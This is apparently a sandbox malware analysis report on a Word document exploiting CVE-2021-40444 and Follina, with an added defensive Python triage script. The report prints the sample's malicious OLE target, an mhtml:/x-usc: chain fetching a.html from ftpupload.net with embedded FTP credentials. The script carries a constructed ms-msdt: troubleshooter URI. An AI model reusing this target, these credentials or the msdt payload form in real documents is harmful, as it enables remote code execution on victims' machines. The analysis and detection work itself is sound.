Windows Analysis Report
v4nkfHg4d9.doc

Overview

General Information

Sample Name: v4nkfHg4d9.doc
Analysis ID: 706117
MD5: cbc307d6059925e9abbdbdec4d9ec0c1
SHA1: 8f0fc563f43cc1422b523a21f01858e031761e5f
SHA256: 8d61ea9ef38b6e7b36f466299223ad43339080d3a9914059c88ca3dd6be5cd32
Tags: doc

Detection

CVE-2021-40444 (external mhtml:/x-usc: OLE relationship in document.xml.rels), Follina CVE-2022-30190 (ms-msdt: URI in the fetched HTML)
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP
Potential document exploit detected (performs DNS queries)

Classification

AV Detection

Source: v4nkfHg4d9.doc Avira: detected
Source: v4nkfHg4d9.doc ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc Virustotal: Detection: 37%
Source: ftpupload.net Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic TCP traffic: 192.168.2.22 -> 185.27.134.11:21, bidirectional (FTP control channel; four separate sessions from client ports 49179, 49180, 49183 and 49186, all to the host resolved from ftpupload.net)
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657, bidirectional (opened while a port-21 session was active; consistent with a passive-mode FTP data channel, which is what triggers the "non-standard ports" signature; the PASV exchange itself is not reproduced on this page)
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008, bidirectional (same pattern: a second passive-mode data channel to the same server)
Source: global traffic DNS query: name: ftpupload.net
Source: Joe Sandbox View ASN Name: WILDCARD-ASWildcardUKLimitedGB
Source: unknown FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49179 (server banner, reassembled from the progressively captured fragments):
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 380 of 6900 allowed.
220-Local time is now 05:31. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 60 seconds of inactivity.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{401971E5-55A6-4DE4-A031-DD1C92F91BDD}.tmp
Source: unknown DNS traffic detected: queries for: ftpupload.net
Source: dump.pcap, type: PCAP Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: dump.pcap, type: PCAP Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: v4nkfHg4d9.doc ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc Virustotal: Detection: 37%
Source: v4nkfHg4d9.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\v4nkfHg4d9.doc
Source: v4nkfHg4d9.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$nkfHg4d9.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6AC3.tmp
Source: classification engine Classification label: mal92.expl.evad.winDOC@1/17@1/1
Source: v4nkfHg4d9.doc OLE document summary: title field not present or empty
Source: v4nkfHg4d9.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: v4nkfHg4d9.doc Initial sample: OLE indicators vbamacros = False
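The two indicators that drive this verdict are visible in plain text: an oleObject relationship whose external target chains mhtml: around x-usc: (the CVE-2021-40444 shape) and, in the HTML that relationship fetches, an ms-msdt: URI (what the EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 rule keys on). The following triage script is an added example, not part of the Joe Sandbox report and not the YARA rules themselves. It parses a document.xml.rels part, extracts the URL chain and the FTP credentials embedded in it, and checks a fetched page for the ms-msdt: URI. The rels sample is constructed around the exact target the report extracted (the rId and the styles relationship are filler), and the HTML stand-in is constructed too, since the report does not reproduce a.html.

```python
"""Added triage check (not part of the sandbox report): parse a Word package's
document.xml.rels for an external OLE relationship, pull the URL chain and any
embedded credentials out of it, and scan fetched HTML for an ms-msdt: URI."""
from __future__ import annotations

import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
SUSPICIOUS_SCHEMES = ("mhtml:", "x-usc:", "ms-msdt:", "ms-search:")
# Follina indicator: an ms-msdt: protocol URI that invokes a troubleshooter pack.
MSDT_RE = re.compile(r"ms-msdt:[/-]?id\s+\w+Diagnostic", re.IGNORECASE)

# Constructed sample rels part. The External target is the exact chain the
# report extracted from the sample; the rId and styles entry are filler.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_TYPE}" TargetMode="External"
    Target="mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html"/>
</Relationships>
"""

# Constructed stand-in for the fetched a.html: the report does not reproduce
# the real page, so only the URI scheme and troubleshooter id are modelled.
SAMPLE_HTML = ('<html><script>window.location.href = '
               '"ms-msdt:/id PCWDiagnostic /skip force /param CONSTRUCTED";'
               '</script></html>')


def external_relationships(rels_xml):
    """Yield (Id, Type, Target) for every relationship with TargetMode="External"."""
    if isinstance(rels_xml, str):
        rels_xml = rels_xml.encode("utf-8")
    root = ET.fromstring(rels_xml)
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode", "Internal").lower() == "external":
            yield rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")


def split_chain(target: str) -> list[str]:
    """Split 'mhtml:<url>!x-usc:<url>' into its bare URLs (the CVE-2021-40444 shape)."""
    urls = []
    for part in re.split(r"!(?=x-usc:)", target, flags=re.IGNORECASE):
        if part.lower().startswith(("mhtml:", "x-usc:")):
            part = part.split(":", 1)[1]
        urls.append(part)
    return urls


def embedded_credentials(url: str):
    """Return (username, password) if the URL carries userinfo, else None."""
    u = urlsplit(url)
    return (u.username, u.password) if u.username is not None else None


def assess_rels(rels_xml) -> list[dict]:
    """One finding per external relationship, with the fields a triage note needs."""
    findings = []
    for rid, rtype, target in external_relationships(rels_xml):
        low = target.lower()
        urls = split_chain(target)
        findings.append({
            "id": rid,
            "ole_object": rtype == OLE_TYPE,
            "schemes": [s for s in SUSPICIOUS_SCHEMES if s in low],
            "urls": urls,
            "hosts": sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname}),
            "credentials": next((c for c in map(embedded_credentials, urls) if c), None),
            # mhtml: wrapping an x-usc: target on an oleObject relationship
            "cve_2021_40444_shape": rtype == OLE_TYPE and "mhtml:" in low and "!x-usc:" in low,
        })
    return findings


def follina_uri_present(html: str) -> bool:
    """True if the fetched page contains an ms-msdt: troubleshooter URI."""
    return MSDT_RE.search(html) is not None


def rels_from_docx(path: str):
    """Read word/_rels/document.xml.rels from an OOXML zip (None if absent).
    An OLE-container .doc like this sample needs its OOXML payload carved out first."""
    with zipfile.ZipFile(path) as z:
        try:
            return z.read("word/_rels/document.xml.rels")
        except KeyError:
            return None


if __name__ == "__main__":
    for finding in assess_rels(SAMPLE_RELS):
        print(finding)
    print("ms-msdt URI in fetched HTML:", follina_uri_present(SAMPLE_HTML))
```

On the constructed sample the single finding reports the oleObject relationship, both schemes, the host ftpupload.net and the credential pair epiz_32594997/fkmeetiwdg lifted from the URL; the credentials matter for response because the same account is what the FTP sessions on port 21 would have logged in with, so they are an IOC in their own right. The regex only flags the URI form the report's rules describe; an obfuscated or base64-wrapped payload would need the page decoded first.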

Persistence and Installation Behavior

Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior